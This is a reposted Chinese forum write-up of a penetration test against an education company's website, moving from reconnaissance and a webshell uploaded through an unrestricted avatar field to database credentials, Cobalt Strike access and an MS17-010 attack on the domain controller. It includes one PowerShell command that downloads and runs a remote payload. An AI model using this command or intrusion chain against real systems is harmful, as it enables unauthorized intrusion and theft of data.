找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2118|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

5 q6 ?3 [; p* E' U9 U( y- _ 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 + N. o9 R0 D1 l8 ^, |4 b1 t

0 } S2 Q) H* R6 Z' w+ F

, J I0 D; i, D+ [! y3 l- N) T& z9 y  1 i( S; i& N7 @0 _" f

0 ~+ c5 _) \) n9 t6 x2 K

( P( s9 i+ Y3 U Y/ T/ E 正文+ T9 e/ g. H7 N

h5 {# p0 z1 `# ?3 @+ z- I

# F( {7 s3 r9 p [. b3 A; N# k   9 i1 m; J) ?/ Z* a: M

g% J3 ]$ f3 [6 ^; R7 ]' J

4 [" h2 t4 l) |5 I$ } 目标:www.xxxx.com(一家教育机构)
. A7 H5 J& \+ O7 S8 H1 _9 f: C/ p
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
0 d+ o7 S( C0 G+ y9 |7 i b

3 e X8 M0 Y) l- @. h" o2 Z$ w

$ g' D; S0 }$ o* W, U) {% @ vshapes=( Y0 d. K, ^6 p9 K# p* t {

1 [2 W# b+ {7 }7 m5 e$ r

9 Y' J* Y: B9 A4 C+ ^ 进行了简单的信息搜集
7 w% \8 p+ C0 p! n( D! B
$ c Y& w! ~) @
9 H4 o2 ~( q- K& h

) ~* H( x4 T9 m! @5 X- g, f) D2 p

) J1 {2 }; ]8 f 子域名搜集& H4 z) l q R$ h/ }' ^/ R

1 X0 R5 W( c/ E! H \* R7 w

2 ~# N0 [ Z! y" K vshapes= . i% ?3 k9 o9 H. c. {# D

* s3 Z+ `" ~- v

9 t% ]$ ?$ W$ {& s fofa找资产
; p( }5 }: U7 T4 c: w/ J% d
& @* i0 A5 w/ b% E2 a8 l% N5 K
. C2 `" i8 Z/ M' {& A. _

$ C/ p5 F+ | Z# R( Y% f, B. N1 E

0 m9 d+ v9 V {/ k4 z( g vshapes=9 X0 Q9 J3 Q k+ |7 F

5 v* z; @& g8 i, \' A# y( p

" b- ~5 }; I: M& g7 i 一共七个资产。去重之后只有两个。
/ ?/ y0 V; z/ q. X6 \; \
+ c. G2 @" D* E& ~0 B# y
V. B1 T% {% A5 o6 L

$ c6 I% J F9 U4 @: [3 y. ]

9 Z, ^: }, l. D3 C' Q1 x+ ^ 目录探测 + D8 N' o$ I' b6 G9 V

2 _4 c! E$ j1 X4 p; b$ \

! Z" c# ]( S |) } vshapes=, `, x1 ~/ R+ E& R1 F P4 M* k

# ]. y% J4 w! y! x, p/ J7 {

0 o4 k" Y0 t- K; X+ p+ Q 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
6 E6 X) D- R- B9 w h' \9 T& Q
, c; M( h% K' C5 X% v1 S5 V6 n
" m( @/ D9 z, s) `: S0 a

7 ~/ W; G8 ^/ m$ r: Q' |1 x& C

" ~4 _. P0 M$ b5 w 我又尝试了通过修改返回包来绕过登录界面 & [; _4 j4 ^4 @# _. `. v

) }( {& l7 _( B

* O+ O7 _! `% S$ x vshapes= 7 t# c& R6 e. ~2 ?# f8 Y

- f8 y2 F! j M( p8 H

8 F7 {# J( x" u1 k# _: ?- [ 还是不行,尝试注入无果 O8 i e6 M1 r

" c5 X& G. q+ b: z& `( V

% q9 I/ U) L5 u# e- g3 e% v4 y vshapes= $ W' c" e! c4 L$ p2 s

: t2 H/ N( G1 }4 ?

! V, k# g7 K* T$ n* I 不过我目录探测出了一处Spring信息泄露
$ B' b2 p# n3 S0 c; C9 m# @
8 d. f# M* ?2 x1 R/ Y
5 ]& Y( k2 ~9 @1 G4 k

/ T5 y8 k( w0 M" C' W

+ v0 g6 Z/ C2 N5 u7 L vshapes= 6 O0 }, _5 a5 O' g+ ^( `

8 ], d" h. i J( d$ P

. N+ D* ~4 I# ]) G: \) J7 a+ | 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录4 F8 e7 P' Z% U- G1 _

* ]! ~' A* F2 A* A# O6 S6 s) D% U

1 _ G- b5 C- A1 ^! e vshapes=9 {2 m- ^3 |5 p4 E% V9 ?

* a$ X: P& ~" J3 s8 R- M: j5 `" H

! m, L1 d' ~& k* a" A& P: P# A 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。! f0 B2 o0 t/ j" B! M$ C; `

3 u5 Z0 P9 J" _6 w7 [

9 a) `1 A, u P6 I0 Y, z8 Q vshapes=, W, L D" T0 @+ Z# T

f7 N, A p4 g# C% a% f; {

* F8 N8 b' [9 b; h* n 获取有些师傅到这一步就手机抓包电脑测了。0 t5 L+ S/ i9 y4 ]! ~

1 f( C7 [ ` Z, F

6 |. U5 s0 W4 ^ Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。! [) A$ { d* {- t

2 X# _ ?# L0 d7 j* ^3 `& B) Y8 h. ^

( ~: ]9 m$ E; p. o; q3 ~! U 其中在一个公众号发现了小程序,可以进行注册。 ! X7 ?' K! m/ n9 u5 d

6 j( l' C* w( q$ x% ]

8 A3 U* @2 y7 ?" R5 b+ Q8 L8 D 看到了头像上传,尝试上传获取WebShell ( p. e4 c; ^' E( |6 J' }/ C1 K

, a1 ?1 R, N S+ P2 u) g

) H- {- `: F" ? vshapes=9 }. Z1 |3 o. _* X2 a6 `% x) e, ]

# D( m; ^- B" e6 Y+ ?

2 r+ s l1 w/ J& x `3 F# ^- X 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 6 @& p* `# q: |; [

% i, I* A Q( u$ u4 J/ D2 C' l+ k

/ N. @" o6 ] F( v' C5 Q vshapes= ( @/ `$ a: V d) e+ ]4 S8 Y1 D

2 r ^8 Z+ ]: j6 D, _

" I) b* c; O. n2 W( t; N/ g! Z. X- j 然后上了大马% X" G) E% h( n6 T

/ S2 W) S# E9 Z- ?+ z1 I5 T- M3 |

/ N u5 D5 ^, u( H/ x6 O. x$ q vshapes= G, R9 Q$ H7 m. L- g

9 @/ B0 F" W1 s4 q* s" ], u5 Q

7 u. U2 A1 Q; ~2 ^ vshapes= ( I" D( n8 F8 H' b

+ V' B8 w$ s- {$ M- B. \+ O0 U

2 H* h" U5 X6 W# |1 [5 k 通过翻找文件发现数据库账号密码 ' Z8 h% Y; B# E: O

7 d8 h/ ?; L8 R5 Q( e

/ v9 [/ z; A1 y) |" }" S vshapes= ; k( k; M4 O/ A" m

4 d9 j* w' i4 {* \

' {7 E! [: d! I, K0 x# v/ x --内网渗透 + P7 u! L/ z/ ?

6 s- a6 `5 ?& E* E9 }( a+ D: }5 }

$ I7 h4 l: C8 v" |( h; V 直接通过powershell执行 cs上线 : p8 g7 u" s. _# `7 Y5 I `# J' N

/ q, D0 V# H$ Z2 p2 @! D9 M

; u) M0 k& ?5 q) J7 }- e powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" # C7 U; M( U% J7 m- b) m

- ^4 w* U- E$ |/ Y; ^* v

& o9 R5 m( f9 } vshapes=" ]6 {$ N! t! c# K1 ~! I! o1 Y

8 ^* c! U4 n5 N. L% G7 u6 z) h

7 i: e( n" J8 ^3 p$ m* F0 \) @9 _ 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 : X; ?1 N ~6 Z( V4 N$ h- y, C

- H; D; I# R% j

9 n Z3 E- `# j5 [) S vshapes=! Y8 j1 G# a3 K; K9 l+ }

& a5 Y X+ [8 l+ J* d

% O: J- H \, c& |( ^+ F$ j 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
/ L# \3 Y; G1 ~" P, W' q! k2 c& k
/ Z& p' f% K: t
8 g- q% Q% J4 ~9 @) P! D$ G; Z: w
6 j# Z3 [0 A" T! L

8 `/ d: t2 k0 t s- z4 V

: r# k( ]. I/ k. S vshapes= . _$ a5 j: U1 U

7 E& A9 c. Z1 l8 u; \

0 ]2 K/ G, b6 g" V 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
, ~3 j1 h a; Y9 }
, z" s$ s4 g$ |0 _
$ q w1 W- X* f# c' M4 e+ g+ o

& r# n( `: C6 D* `8 _

: g: C$ [0 e9 w. W, M vshapes= 8 ?* i% N, ]- W7 L9 q

1 n1 U0 i0 k& V% l5 J. x

( j/ R2 [& P) ~0 A$ g
+ j& k/ E' l' r* x Q8 M. z
$ z, |" U" E! K. v( ]# y; y
7 x2 u: w/ F1 M& ~7 N; [1 G

/ T7 F, {6 T( F

$ f# m6 T8 a5 t7 U- A& n! }7 t   9 f" ~ c, `2 M% A

- _4 A: k3 p( O3 Z/ d! f

9 Y- O1 F. `2 z3 B1 u& Y' @ K! n: b 小结 3 K4 b& Z$ C7 E; S. D% j/ l

2 B s1 o5 J3 W z) W

0 |9 \% \, ?4 W: f- T9 n  5 Q$ R4 ~* Q) b' L/ I" k- {% U5 S

$ H) T: d/ ~3 v0 H- J6 s: S

$ q* u6 ?% t3 a# _% i+ T- ?$ _9 D 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! ( o. \" i; a0 [% \, _6 K$ Z

# `" P4 v Z" h m" k# h

9 C# O: z7 [3 q( P   3 A8 j1 n" X' T: |

3 ]: i1 ]6 J2 h/ H* E% c
    5 U9 R- i6 A1 @& {
  • ( G0 E8 P9 D" o6 U4 Q* y& [   9 U# |4 y2 }' W0 O, c2 [
  • ; s- o1 G8 ?+ [1 ~& n6 `6 ~% [0 e
  • 7 b$ a& @ D% z! p- |2 r8 }   $ u* P9 b F* Q& r
  • 0 `4 j3 m8 U! ? I" b1 z2 A
8 Z, Z6 f4 @8 ~ O# S! ?- r) x, d4 A

3 V1 C) l% X, x. o 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html1 Y0 j2 F2 r& t" N' m

7 R+ M, ~" r: Y" w0 m

& d! X) M- W' }6 p2 [; D0 q/ o   5 `4 |3 h0 q+ ? V

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表